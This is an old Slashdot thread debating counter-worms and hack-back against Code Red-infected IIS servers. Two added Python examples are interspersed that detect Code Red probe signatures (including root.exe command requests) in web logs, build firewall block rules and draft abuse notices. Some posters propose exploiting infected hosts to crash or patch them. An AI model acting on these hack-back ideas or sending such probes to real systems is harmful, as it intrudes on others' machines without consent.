      But based on what I'm seeing from the description (I haven't unzipped/untarred it yet), I suspect it's more along the lines of what I've been wanting to do. If I get a request from an IIS-infected machine, why not have it force a reboot of that machine? Through the negligence of the system's owner, it attacked me. Why can't I merely force a reboot, clear the virus from the memory, and hopefully alert the imbecile involved that he's got a problem?

      Take a look at my webserver log (link from my sig). I seem to be getting hit by the same IIS-infected hosts over and over. I'm sure the IIS-infected machines are getting hit by the same other machines over and over. If I were to force a reboot of those machines which attempt to infect my Apache server, then they'd promptly be reinfected, and since Code Red II scans within a tighter range of IP addresses, I'd probably take that machine down again. Of course, the cycle would repeat, and infected machines where I'm within their scanning range would be coming up and going down all day. Surely the owner would eventually realize something was wrong?

      I'd love to do this, but I still don't like the legal implications. Stealing a car to prevent someone driving while drunk is still illegal, and this is a lot less clear-cut.

      --
      Fire and Meat. Yummy.
    2. Re:A K5 USer has published an anti-CodeRed virus by spectral · · Score: 0

      Because code red 2 saves itself to disk AND backdoors the computer. Rebooting does nothing then.

    3. Re:A K5 USer has published an anti-CodeRed virus by ihawk · · Score: 1

      The anti-codeRed doesn't reboot the computer, it just shuts it down and leaves it down. The owner is probably clueless enough that they will just start it back up again, but after a while, maybe they will get an idea that there is something they need to pay attention to.

      Also, the anti-CodeRed thing is not another virus. It simply replies to requests for /default.ida from an infected system and tries to shut down that system. It does not then propagate itself into other computers. It just takes advantage of the IIS fault in already infected servers.

      I haven't run this anti-CodeRed script, so I can't say if it works. I have mixed feelings about the ethics of it. But it is really tempting since I am getting sick of the hundreds of CodeRed probes I'm getting every day and the constant ARPing against my cable modem.

    4. Re:A K5 USer has published an anti-CodeRed virus by prgammans · · Score: 2, Insightful

      As the infected server is requesting an action from your server by contacting you in the first place, you could say that this is an obvious request for you to fix their machine.

    5. Re:A K5 USer has published an anti-CodeRed virus by Mazianni · · Score: 1

      Any attempt to alter the code running on someone else's machine is totally immoral, regardless of whether you're trying to be 'helpful' or not. It's still a virus, and you're still tampering with someone else's machine without their consent, and it's quite likely that you're going to end up trying to defend yourself in court.

      A much more sensible way to deal with this type of virii would be to create something like the RBL for known infected machines. I don't have the link handy, but the RBL is a list of known unsecured email reflectors, and it's used to fight spam. It's pretty simple: mail servers configured to use it simply refuse to accept any SMTP connections from all servers on the list. When a site is added, a notice is sent to root at that site, and the site can get removed simply by telling the RBL maintainer that they've fixed the problem.

      To solve the problem of these DOS floods, all you'd have to do is put packet sniffers on the major backbones that flag the traffic from infected sites for operator intervention. The operator then just adds a packet filter to reject whatever types of packets are being flooded, and sends an email to root@infected site telling them to fix the problem. Once they fix it, they just reply asking to have the filter removed.

      The workload from this kind of solution could be immense if there are large numbers of infected hosts, but it would be totally voluntary, and the workload could be spread out quite a bit if the major networks collaborated and maintained a master blacklist. Also, this would be an easy way to quickly minimize the effect on the network of any kind of DOS flood.

      SPQA
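
      The two defensive ideas in this thread, the "download their main page and e-mail the webmaster" script from the "Another approach..." comment and the RBL-style blocklist for known infected hosts proposed just above, as one added example that is not code from any poster: it triages constructed Apache access-log lines for Code Red probes, aggregates them per source, produces a blocklist for a packet filter or shared list, and drafts the notice. Assumptions: Apache common-log format, documentation-range IPs and a constructed front page (fetching the real page happens out of band), and the known fact that the original worm padded its /default.ida request with "N" and Code Red II with "X".

```python
import re
from collections import defaultdict

# Apache common/combined access-log prefix: client IP, identd, user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)

# Code Red probes request /default.ida with a long padding string: the original
# worm padded with "N", Code Red II with "X" (the thread quotes the latter form).
PROBE_RE = re.compile(r'^GET /default\.ida\?(?P<pad>N+|X+)')

# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [04/Aug/2001:10:01:12 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 285
203.0.113.5 - - [04/Aug/2001:10:02:30 -0400] "GET /index.html HTTP/1.1" 200 1043
198.51.100.7 - - [04/Aug/2001:10:05:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 285
192.0.2.10 - - [04/Aug/2001:10:06:40 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 285
198.51.100.7 - - [04/Aug/2001:10:07:55 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 285
198.51.100.7 - - [04/Aug/2001:10:09:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 285
203.0.113.44 - - [04/Aug/2001:10:11:00 -0400] "GET /default.ida?NNNNNNNN HTTP/1.0" 404 285
this line is not a log entry
"""

# Constructed stand-in for the offending host's front page, fetched out of band.
SAMPLE_FRONT_PAGE = ('<html><body>Welcome!<p>Contact '
                     '<a href="mailto:webmaster@example.org">webmaster@example.org</a>'
                     '</body></html>')


def classify(request):
    """Return 'CodeRed', 'CodeRedII' or None for one request string."""
    m = PROBE_RE.match(request)
    if not m:
        return None
    return 'CodeRedII' if m.group('pad').startswith('X') else 'CodeRed'


def triage(log_text):
    """Aggregate probes per source IP: {ip: {'variant', 'probes', 'last'}}."""
    hits = defaultdict(lambda: {'variant': None, 'probes': 0, 'last': None})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-access line: skip rather than crash
        variant = classify(m.group('req'))
        if variant is None:
            continue  # ordinary traffic
        entry = hits[m.group('ip')]
        entry['variant'] = variant
        entry['probes'] += 1
        entry['last'] = m.group('ts')
    return dict(hits)


def blocklist(hits, threshold=2):
    """Sources probing at or above the threshold: input for a local packet
    filter or a shared RBL-style list. A single hit is not enough on its own."""
    return sorted(ip for ip, e in hits.items() if e['probes'] >= threshold)


EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')


def find_contact(html):
    """Pick a contact address out of a front page; prefer role accounts."""
    addrs = EMAIL_RE.findall(html)
    for addr in addrs:
        if addr.split('@')[0].lower() in ('webmaster', 'abuse', 'postmaster'):
            return addr
    return addrs[0] if addrs else None


def notification(ip, entry, contact):
    """Draft the notice an admin would send; nothing is sent from here."""
    if contact is None:
        return None
    return (f"To: {contact}\nSubject: {entry['variant']} probes from {ip}\n\n"
            f"Our web server logged {entry['probes']} {entry['variant']} requests "
            f"for /default.ida from {ip}, most recently at {entry['last']}. "
            f"This indicates the host is infected; please apply the vendor patch "
            f"and disinfect it.\n")


if __name__ == '__main__':
    hits = triage(SAMPLE_LOG)
    for ip in blocklist(hits):
        print(ip, hits[ip])
    contact = find_contact(SAMPLE_FRONT_PAGE)
    print(notification('192.0.2.10', hits['192.0.2.10'], contact))
```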

    6. Re:A K5 USer has published an anti-CodeRed virus by Spacelem · · Score: 1

      um, what's wrong with being uncircumcised?

  101. Re:Virus that installs linux by ianxm · · Score: 1
    At some point there were rumors of that virus existing. It was called Tuxissa (Tux the penguin mixed with Melissa the virus). It was a hoax and didn't really exist. (damn)

    here is more info.

  102. Better idea: White-hat Viral patch! by kalamazoo904 · · Score: 1
    OK, so the consensus is that using someone's computer without their consent, even to do them a favor, is both illegal and a Bad Thing.

    So why not ask for their consent? Like this:

    (1) User A, who has clue, downloads the patch and fix.

    (2) Fix, as a part of the fix, scans his files to determine where infective packets have been sent.

    (3) Fix requests: "Send this fix package to those who have been infected? y/n"

    (4) If yes, fix zaps to chosen people. (Email, ftp, whatever.)

    (5) Email says to clueless user B, "I have been sent by such-and-such because his computer indicated that you were attacked and/or infected by $INFECTIVE_PROGRAM."

    (6) Fix says, "My authenticity can be verified by going to website blah-blah-blah, and downloading X program." Or perhaps there is no attachment to the email, and it links you to the website to download the fix.

    (7) User B, now clued, downloads the fix and runs it. Process iterates.

    Unless the box is moldering in a closet somewhere and hasn't been touched in months, this system should get through to all infected users eventually. And best of all, it's TOTALLY VOLUNTARY on each and every user's part.

    Comments?

    --
    Your friendly neighborhood nitpicker
  103. There's a reason for that. by dave-fu · · Score: 1

    @Home/Mediaone has blackholed all incoming traffic on port 80. Go figure.
    It's still a bad idea in so many ways, but that'd just be a redundant rant.

    --
    Easy does it!
    1. Re:There's a reason for that. by mgkimsal2 · · Score: 2

      I don't see at all why it's a bad idea. Please explain.

  104. What about... by Anonymous Coward · · Score: 0

    What about one that rings the doorbell just to tell you that your door is open?

  105. Re:Take it one step futher... by Anonymous Coward · · Score: 0

    And after closing the hole, the counter-virus should stay resident and launch a counter-attack against anyone who tries to exploit the hole..

    Dude, we already have those, and they're called anti-virus software with gatekeeping features.

  106. Worm won't do the most important thing, educate. by cant_get_a_good_nick · · Score: 1
    If stuff happens automagically, people won't know that there was a problem. I mean if folks didn't patch their servers after all the news that was around on this, they're not going to know. Sure you patch this one, but what about the next one, and the one after? They need to know that their server, as part of the Internet, also can affect the Internet, and they need to keep it reasonably secure.

    The problem is that the person with a rooted server now is someone who doesn't know what's going on. They don't know what they're running; they don't know they're running IIS; they don't know that they're running the indexing server, something. This person is also likely to have other services that may be rooted. Patch this one secretly and they'll never know. The best suggestion I've seen is to collect firewall logs and send mail to the webmaster. This won't work for all cases because a bunch of people will have a web server and not a mail server.
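Collecting the logs and mailing the webmaster, as an added example that is not from any poster in this thread: it parses Apache-style access log lines for the `default.ida` request Code Red sends (and for `root.exe` probes, the backdoor file mentioned elsewhere in the thread), tallies hits per source address, emits the operator-side packet filter another poster suggested, and drafts the notice. The sample log lines are constructed and the payload suffix is abbreviated; the `webmaster@`/`root@` role addresses and the iptables rule form are assumptions.

```python
"""Flag Code Red probes in a web server log and draft the operator notice (added example)."""
import re
from datetime import datetime
from typing import Dict, List, Optional

# Apache common/combined log prefix: client, ident, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Code Red's overflow request hits default.ida with a long run of filler characters:
# the first variant pads with N, Code Red II with X.  root.exe is the backdoor file
# this thread talks about, so a request for it marks a post-infection probe.
SIGNATURES = [
    ("codered-probe", re.compile(r"^GET /default\.ida\?N{20,}", re.I)),
    ("codered2-probe", re.compile(r"^GET /default\.ida\?X{20,}", re.I)),
    ("root.exe-probe", re.compile(r"/root\.exe", re.I)),
]

# Constructed sample log; the %u payload suffix is abbreviated, not a real capture.
FILLER = "%u9090%u6858%ucbd3 HTTP/1.0"
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Aug/2001:10:12:01 -0700] "GET /index.html HTTP/1.1" 200 1043',
    '192.0.2.10 - - [04/Aug/2001:10:12:05 -0700] "GET /default.ida?' + "N" * 224 + FILLER + '" 404 275',
    '192.0.2.10 - - [04/Aug/2001:10:13:40 -0700] "GET /default.ida?' + "N" * 224 + FILLER + '" 404 275',
    '203.0.113.42 - - [04/Aug/2001:10:14:02 -0700] "GET /default.ida?' + "X" * 224 + FILLER + '" 404 275',
    '203.0.113.42 - - [04/Aug/2001:10:14:03 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280',
    "this line is not a log record and must be skipped, not crash the parser",
]


def classify(request: str) -> Optional[str]:
    """Label a request line, or None if it matches no signature."""
    for label, pattern in SIGNATURES:
        if pattern.search(request):
            return label
    return None


def parse_line(line: str) -> Optional[dict]:
    """Pull client IP, timestamp and request out of one log line; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return {"ip": m.group("ip"), "ts": ts, "req": m.group("req")}


def summarize(lines) -> Dict[str, dict]:
    """Per source IP: how many flagged requests, which kinds, first and last sighting."""
    hits: Dict[str, dict] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec["req"])
        if kind is None:
            continue
        entry = hits.setdefault(rec["ip"], {"count": 0, "kinds": set(),
                                            "first": rec["ts"], "last": rec["ts"]})
        entry["count"] += 1
        entry["kinds"].add(kind)
        entry["first"] = min(entry["first"], rec["ts"])
        entry["last"] = max(entry["last"], rec["ts"])
    return hits


def firewall_rules(hits: Dict[str, dict], min_hits: int = 1) -> List[str]:
    """The operator-side filter from the thread: drop port-80 traffic from flagged sources."""
    return [f"iptables -A INPUT -s {ip} -p tcp --dport 80 -j DROP"
            for ip, e in sorted(hits.items()) if e["count"] >= min_hits]


def draft_notice(ip: str, entry: dict, contacts=("webmaster", "root")) -> str:
    """Mail to conventional role addresses at the bare IP (assumption: they may not exist,
    as another poster notes for Windows hosts)."""
    to = ", ".join(f"{c}@[{ip}]" for c in contacts)
    kinds = ", ".join(sorted(entry["kinds"]))
    return (f"To: {to}\n"
            f"Subject: host {ip} appears infected with Code Red\n\n"
            f"Between {entry['first']:%Y-%m-%d %H:%M:%S %z} and {entry['last']:%Y-%m-%d %H:%M:%S %z} "
            f"your host {ip} sent {entry['count']} request(s) matching {kinds} to our web server.\n"
            "Please patch IIS and reboot; reply once fixed and we will remove the filter.\n")


if __name__ == "__main__":
    found = summarize(SAMPLE_LOG)
    for rule in firewall_rules(found):
        print(rule)
    for src, info in found.items():
        print(draft_notice(src, info))
```

Running it over a real access log is a matter of passing `open("access_log")` to `summarize`; the unparseable line in the sample is there to show that junk in the log is skipped rather than aborting the whole sweep.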

  107. Re:Because of this the internet is dying.. by festers · · Score: 1

    Please, please, PLEASE, learn your proper English plurals.

    There's no reason to be making up words.

    --


    -------
    "Every artist is a cannibal, every poet is a thief."
  108. Fight Spam With Spam? by glassware · · Score: 1
    Has anyone yet sent out a real virus-warning spam?

    When I receive a bogus virus warning from my friends (e.g. Good Times), I reply:

    • Check urbanlegends.about.com to see if it is a hoax before forwarding an email.
    • Proper virus warnings show up as articles on CNN, or companywide notices sent by your company's IT administrator. If it didn't come from either of these two sources, ignore it.
    This is my own attempt to educate the user population. However, virus spam messages seem to be much better at educating the population than my replies.

    So what would happen if I wrote a serious message with a real warning (e.g. "Anything with a .VBS extension is a virus.") and said, "Forward this on to everyone you know?"

    P.S. Based on my understanding of privacy laws, it's legal to encourage people to forward messages to their friends, as long as you aren't collecting information about them.

  109. Repairing worms are not really illegal. by Anonymous Coward · · Score: 0

    The last guy that wrote a "repair" worm was not jailed for writing the worm. He was jailed for writing a worm that left a back door. If we released a worm that patches, propagates, and erases itself without installing back doors, is THAT legal? The last guy that tried this was arrested because his worm installed a back door. A pure "fix-it" worm should have no detractors. Now here's a good application: create an MS Outlook virus that completely disables extension execution, runnable scripts, and all those other nasty security holes in Outlook. Send it out as a porn email and watch it spread like mad. A few "waves" of these and we will have fewer and fewer Outlook viruses. Remember, the way to control a virus is to make it more difficult to reproduce. If we lower the production rate for these Outlook viruses by releasing a countervirus, production of infected emails could be reduced greatly. And I wouldn't have to delete fifty Sircam viruses from my email box every time I checked it.

  110. Re:This has already happened by keanie · · Score: 1
    Any just what would we be saying if someone in "authority" (say the FBI) did release such a "virus" ?

    I suspect we wouldn't be impressed!

    And would be talking about what backdoors they may be installing on our machines...

  111. Re:Its entirely possible by meldroc · · Score: 2

    Which is excellent justification for killing him, burying the body in some remote location, cleaning up the mess, and denying everything. ;)

    --

    Meldroc, Waster of Electrons
  112. Re:Closing the Backdoor by JayHerrick · · Score: 1
    Does anyone have any ideas in light of these problems?

    It seems to me that everyone has a problem with distributing another "worm" and damaging the infected system. Why not take this approach: First, write an Apache module that would use the original exploit to gain access to any system that attacks the "defending server". Second, once the attacking system has been accessed simply disable the TCP/IP stack (no permanent damage). This would result in the attacking system being shut down until an administrator could repair the system (or even be made aware of the problem for that matter). And because the module would have to be installed on a server you would not have to deal with another worm running around unchecked.

  113. Re:I don't know if this would be legal. by Anonymous Coward · · Score: 0

    If someone leaves their lights on in the parking lot do you open the car door and turn them off? A better analogy is you walk in the front door of someone who went on vacation and lock the door for them... Cy

  114. Re:Already been done by ddent · · Score: 1

    well come on, don't just tell us it exists... tell us where! ;)

  115. Cert, ISS, MS already discussed this. by Anonymous Coward · · Score: 0

    I unfortunately do not have a link, but I know this was actually discussed as a solution by these organizations, and the idea was thrown out. However, if a "white hat" hacker were to do this, I think many sysadmin type people would all let out a collective sigh. -k

  116. Re:Why do favors? by CyberPsyko · · Score: 0, Troll

    Amen!

  117. Thought of this... by jcronen · · Score: 1
    I'd actually thought of this idea as a way to rid myself of a macro virus I'd had on several of my machines. Write another "virus" that checks for the existence of that virus and neuters it, then propagates to all other files it can find.

    My biggest paranoia would be that I'd write it so it would go out of control, then I'd be the one they'd be hauling out of the police car and into the courthouse on CNN.

    And I can't honestly think that I'm the only one that ever thought of this.

    Has anyone else heard of/attempted/got in trouble for fighting fire with fire in this way?

    1. Re:Thought of this... by Anonymous Coward · · Score: 0

      Hmmm... Well wouldn't this KINDA be like back in the 80's when people would hack into a company like a bank, steal all the money electronically, notify the company of what he did and tell them that he/she ought to be hired to do electronic security for them? I'm sure it's an apples/oranges argument in a way, but what's better? Letting the virus run rampant?

      No one will ever likely be able to move fast enough to inoculate this independently. By coding a counter virus, or metaphorically speaking, a 'white blood cell', you could let the problem cure itself.

      Is it ethical? Hmm. Well if I was a business owner with an NT based server *snort* and my computer got fucked red and raw by a virus and someone 'infects' it with the cure, I'd probably be happy someone was considerate enough to help me out. And how much did I pay for the 'cure' in the end? Zero, nada, zip. Well 'cept maybe a reminder to keep myself updated. ;) Give the 'net some self defenses... That's about the only way you are going to keep it from 'crashing' as it continues to grow and evolve.

      Yeah, people can write 'counter' viruses for anti-viruses, etc etc. Thats part of growing, part of evolving. And besides, wouldn't beating a virus with a virus just show whoever coded it is a worthless lackey? :)

    2. Re:Thought of this... by Anonymous Coward · · Score: 0

      Funny, how quickly we forget...I did a search for the words "Max Vision" on this page, and didn't get one hit...he's in jail right now for doing exactly what you idiots are saying just might be ok...slashdot is idiotic, there should be one post under this article saying "Read about Max Vision", and that should be that...not a bunch of fuckin idiots pretending to be lawyers...grow up fools.

  118. I don't know if this would be legal. by crcerror · · Score: 0, Redundant

    I've played with this idea before as well, but the one thing that I always thought is that this seems like it would be equivalent to breaking into someone's house and then fixing the way you came in. It's still breaking in, regardless. Kind of a "white hat" hacker deal but that still is considered a "no no" in the eyes of the law.

    You're still infecting them with a virus, it's just a good virus and you could probably be brought up on charges under some computer crime legislation.

  119. virus vs virus by motox · · Score: 1

    I think there was a virus a long time ago whose only purpose was to kill another virus; I don't remember if it was on the Amiga or on the PC. Anyway it still ended up being classified as a virus. To be honest I prefer to have control over my anti-virus program rather than have Core Wars games running on my PC without my control :)

    1. Re:virus vs virus by Chakat · · Score: 1

      Actually, in the waning days of the "high quality" viruses, there were several viruses that, in addition to their payload, would "kindly" disinfect viruses written by rival virus groups. Of course, now, most viruses are clunky VB things written simply to cause as much havoc as possible, without worrying about size, elegance, etc. Sircam, and its integrated SMTP server, is the closest virus, in terms of elegance, to the "good ol' days" of viruses.

      --

      If god had intended you to be naked, you would have been born that way.

    2. Re:virus vs virus by Anonymous Coward · · Score: 0

      I think it would be interesting to see a site that allows people to send in a virus to compete with other viruses (similar to Battlebots on TV).
      What do you guys think?

  120. Anti-Sircam Virus by zpengo · · Score: 5, Funny

    Why not take the Symantec Sircam cleanup utility, patch it to make it self-propagating, and then e-mail it out with the message "Hi there! I send you this because you're a stupid fscking idiot. :)"

    --


    Got Rhinos?
    1. Re:Anti-Sircam Virus by Lando · · Score: 2

      Actually, one of my customers received a message to this effect; he was automatically sent back a message saying that Sircam had infected his system and the patch to fix it could be located at McAfee.

      A link was included and though my customer didn't understand the problem he called me and we had it fixed in a couple of minutes.

      Lando

      --
      /* TODO: Spawn child process, interest child in technology, have child write a new sig */
  121. Closing the Backdoor by Meridun · · Score: 1
    I've thought quite a bit about this, since my Apache server has been getting hammered with probes, and now my ISP (ATT Broadband) seems to have blocked connections to port 80 of its subscribers, leaving my website high and dry (yes, I can jump ports, but then I have to tell everyone I've jumped ports.)

    Unfortunately, the general consensus is that the proper remedy for this worm is to reformat and reinstall on an infected machine. And while the idea of reformatting the drives of all those idiots who got themselves infected and are probing my machine is very appealing, it's also potentially very illegal.

    I would be in favor of half-measures, like a script that would patch the IIS vulnerability, and clear out the root.exe and explorer.exe vulnerabilities, but this may be ultimately harmful, since it may not remove all vulnerabilities AND it may make detection of the exploit more difficult for the machine owner.

    Does anyone have any ideas in light of these problems?

    1. Re:Closing the Backdoor by Anonymous Coward · · Score: 0

      I'm actually trying to mount a back-attack on everybody trying to get some "default.ida" file from my server (using the same Index Server hole to crash the attacking system). I'll start as soon as I get enough subscribers so that the effort at least will clean out the infected machines at our ISP (CableCom Switzerland), and I'll also wait until my lawyer has got the legal stuff ready, of course :) Since I understand that the virus will become "silent" if the computer gets rebooted.

    2. Re:Closing the Backdoor by RGRistroph · · Score: 1

      Re-formatting and re-installing doesn't work if the default install has a vulnerability. The machine will just be infected again within minutes.

      Not removing all vulnerabilities is better than not removing any. As far as making the detection of the exploit difficult, most of these people don't even realize that they are running the IIS webserver, and would have no idea how to patch it or turn it off. If you want to launch a virus that will educate users, well, you will fail. These people don't know about the systems they are running because they don't *care*, as long as it works for them. You'd have better luck teaching a high school detention hall about relativity. The users will just click, ctrl-alt-delete, reset button, or even re-install selecting the exact same insecure options, and somehow thrash their way back to being able to use their machine regardless of what helpful educational messages you pop up.

      So I say those problems aren't problems. I would write a daemon that would check any infected IP that attacked me 24 hours later, and if it was still infected, would just go in and patch/kill IIS/whatever. A little log file left in C:\ might scare the machine owner into thinking people were hacking his machine and that he needed to re-install, which would cause him to get re-infected. So don't tell him shit. Go ahead and install McAfee and set his Outlook options to make him see all of the file extensions, etc.

      I thought about doing this myself by using the backdoor to upload a statically linked perl.exe and writing it all in Perl. But Code Red is just not a big enough problem to be worth the time, let alone the heat you might get for writing a virus, good or bad. I don't run IIS, I don't have websites that are much bothered by it, and while my broadband connection is a little slower these days it is still pretty bearable. I say let the Windows users just carry on.

      As for ATT blocking your port 80, they are obviously not blocking it from inside their own network if you are getting exploit attempts on Apache. ATT can't deny port 80 from the inside to the outside to stop their network from infecting other people because all their customers just browse the web; apparently they can't deny port 80 within their network or they already would have; so they are stuck doing something useless. It does nothing except degrade the worth of their service, until they have wiped out Code Red inside: shutting the barn door after the horse is IN, so to speak. Communicating this to anyone who could make the decision inside ATT Broadband is hopeless, but what you should do is send them the token email to support and other places, and then cancel and switch to someone else.

      The only person I could see bothering to write a fix-virus would be someone concerned about information spreading by the appearance of all these backdoors. For example, if I were a sysadmin at the Pentagon or State Department or even a very large corporation, I would write that (probably make it not live outside my organization for legal reasons). Even though you probably can't use the backdoor Code Red creates to get from the outside to the inside, all those big organizations have a lot of compartmentalization of information and are so big you have to presume the existence of a few disgruntled employees or outright spies at any given time.

    3. Re:Closing the Backdoor by Meridun · · Score: 1
      Well, first off, I don't think anyone should write this as a virus; that's just plain stupid. Write it as a targeted script against known infected IPs. I believe that's what you were advocating here and I agree with it, but the terminology was a bit ambiguous in spots and I wanted to make sure.

      Your comment on the Default Installation Settings problem is probably on target as well. I really couldn't say what the default installation is for Win2K since I never pick default, and I specifically don't install IIS. I had assumed that it was not in the default, although it is very possible that it is.

      As for ATTBroadband blocking port 80, I'm fairly sure they are since I've gotten no non-local traffic on apache since Monday at 11pm. I have no problems with connecting locally, and have checked my firewall settings. Additionally, I've read reports from fairly credible sources stating that they were taking these steps, and I have confirmed that I can't connect to my webserver remotely, but have no problem connecting on other ports. Note that they only blocked inbound connection attempts on port 80; outbound works just fine.

    4. Re:Closing the Backdoor by Anonymous Coward · · Score: 0

      I would just like for there to be a way to contact the operator of EVERY server on the public internet by email, instead of having to risk legal exposure under the boneheaded computer crime laws we have. I don't have to know their real name, phone number, and address, just give me a goddam working email. This ought to be a requirement, no, it ought to be part of your connectivity. Greedy, lazy ISPs, though, have made it difficult by being stingy with static IPs, reverse DNS delegation, and not wanting you to run servers to start with. (What's it going to take? Class action lawsuits for false advertising and consumer fraud?) Yes, you can get third-party primary forward DNS, at additional expense, probably in violation of somebody's TOS, but that doesn't help if you only have an IP number and they're not using "hostmaster", "abuse", etc.

      Oh, they tell us IPv6 will fix all this. I'll believe it when I see it.

      Rogue Bolo

  122. Still a virus... by rkischuk · · Score: 0, Redundant
    Technically speaking, this is still a virus, and still costs companies bandwidth and processor time.

    Also, it opens the door for a whole new wave of confusion. Suppose I tweak the "good" virus, and add a little bit of insidious behavior? What if I send out a "bad" virus claiming it is a "good" one?

    Right now, we're fighting a losing battle to get users to STOP clicking on unknown attachments. Any progress we do make would be COMPLETELY destroyed by encouraging them to install "good" virii. Right now, the optimal virus protection might be a grammar checker. You'd think that the guys who wrote Zero Wing had found a new hobby.

    --
    Seen any BadMarketing lately?
  123. This has already happened by cnkeller · · Score: 4, Insightful
    A while ago (months?) someone had a "beneficial" virus that was making the rounds and fixing security holes in Windows, I believe. The name escapes me. The author (who publicly claimed responsibility) caught quite a bit of flak over it. Who knows what kind of hidden payload you're packaging in addition to the helpful features.

    Personally, I feel a virus is a virus, regardless if your intentions were good. You're not any better than the hundreds of losers out there creating this mess. If you want to warn me of security holes in my system, send me an e-mail that doesn't contain a virus.

    --

    there are no stupid questions, but there are a lot of inquisitive idiots

    1. Re:This has already happened by rabidcow · · Score: 1

      It's probable that you don't understand the difference between right and wrong.

      It's not a matter of right or wrong, it's a matter of questionable or wrong.

      If I leave my doors unlocked, do I want my neighbor to come in, walk all through the house locking every door? Heck no! I want him to stay out of my house if I'm not there. If I leave the doors unlocked, I want them unlocked.

      Computers are stupid. No matter how much smarts you put into a worm to tell it "fix this problem, everywhere" more likely than not it'll screw up somehow, somewhere. We're not talking about your neighbor coming in and locking your doors. We're talking about the guy across town teaching a dog to run around town and lock everyone's doors.

    2. Re:This has already happened by blair1q · · Score: 2
      I'm certain you don't know right from wrong, because you've defined your terms, and messed it up.

      "Illegal" is not the same as "wrong".
      "Legal" is not the same as "right".

      Police typically check locks on doors. They can and do enter property they find open and unoccupied, and they can and do lock those doors if possible and if they think it's a reasonable thing to do given the neighborhood (hint: the internet "neighborhood" is roughly every machine on it, and everyone, good or bad, lives right next door to you). A warrant merely franks the search into evidence.

      The fact that you don't like your neighbors is your problem. The rest of us will thank ours for looking out for us.

      What I'm discouraging is people trespassing on my system without my prior consent. If I want a patch (as in your case of buggy software), I'll initiate the transaction thank you. I don't want anything pushed to me.
      Then you might want to stop accepting unsolicited communications.

      You might be competent to download and apply a patch. But the network is full of incompetent or apathetic people, and their incompetence results in the ability of dangerous worms to propagate.

      Their computers are emanating viri and worms just as evilly as the computer that originally did it. If a bum who crawled in your open door and died was emitting a foul stench and bacteria that were wafting down the street infecting other houses, you can bet I and the local HazMat team would be, without a warrant or your permission, all over your door nailing it shut, and your pewling cries of "trespassers!" wouldn't impress a jury.

      The problem is that the Internet hasn't got itself set up that way, and the real culprits, the ones who install and run buggy software on a public network, are not being prosecuted.

      --Blair
    3. Re:This has already happened by JayHerrick · · Score: 1

      If you want to warn me of security holes in my system, send me an e-mail that doesn't contain a virus.

      Being Windows servers, most of the addresses that are attacking me do not respond to root@[ip] or webmaster@[ip]

      So what now?

    4. Re:This has already happened by cnkeller · · Score: 1
      It's probable that you don't understand the difference between right and wrong.

      Uhh, I don't think you know the difference between right and wrong. Intruding onto my property, either computer-wise or property-wise, is illegal in the United States without either prior consent or a warrant. Since warrants don't really exist in the cyber world, anyone intruding into my system for whatever reason is wrong and also illegal.

      What I'm discouraging is people trespassing on my system without my prior consent. If I want a patch (as in your case of buggy software), I'll initiate the transaction thank you. I don't want anything pushed to me.

      --

      there are no stupid questions, but there are a lot of inquisitive idiots

    5. Re:This has already happened by blair1q · · Score: 4, Insightful

      >Personally, I feel a virus is a virus, regardless if your intentions were good.

      It's probable that you don't understand the difference between right and wrong.

      Think of cops and robbers. We have bad guys with guns running around on the streets, and we have good guys with guns running around on the streets. Neither group is very bright, and both are liable to shoot you for pulling your wallet out too fast in a darkened doorway. Still, we know which group we're going to train and pay to protect us using their own judgment.

      A neighbor who checks and locks my door is far more neighborly than one who walks in, spray paints graffiti on my walls, craps on my carpet, leaves a dead rat hanging between the old coats in the closet, and says "oh, you have a security problem, you should get that fixed before someone does something bad to you".

      People who bought buggy software got ripped off, and you're discouraging conscientious software engineers from providing free, automatic service to those people, and preventing them from becoming unwitting dupes in spreading the bad viri around the world.

      But you shouldn't live in fear that this will become epidemic. People who do know right from wrong and who do choose to do right understand that doing right is often mistaken for doing wrong by people who don't know the difference, and our system of justice isn't based on right and wrong, it's based on perception, so they won't take the chance of being railroaded, Good Samaritan law or no.

      --Blair

    6. Re:This has already happened by dazed-n-confused · · Score: 2
      If you want to warn me of security holes in my system, send me an e-mail that doesn't contain a virus.
      Hi! How are you?

      This is the file with the information that you ask for.

      [SecurityHoleWarning.doc.exe]

      See you later. Thanks.
    7. Re:This has already happened by startled · · Score: 1

      Hmm, actually, about a year ago my neighbor accidentally left her door open. I closed and locked it for her. She thanked me later.

      Analogies are often stupider than computers.

    8. Re:This has already happened by AntiTuX · · Score: 1

      as I recall, it was called something like the Lion worm or something like that.
      --John

  124. no no no by aozilla · · Score: 1

    Why not have another virus that exploited the back door, closed it, then started sending itself to other servers for a certain period of time?

    Sending to other servers for a certain period of time is not a good thing. First of all, you are causing harm by checking those other systems. Secondly, you are causing harm on the machine you install this on. Thirdly, you might screw it up, and accidentally cause even more harm than you intended.

    I don't have a problem with exploiting the back door and closing it for any site which specifically tries to infect you, but after that your interaction with the other server should stop. Even that has the problem of possibly not letting the victim know about the problem, and that in itself is troublesome.

    --
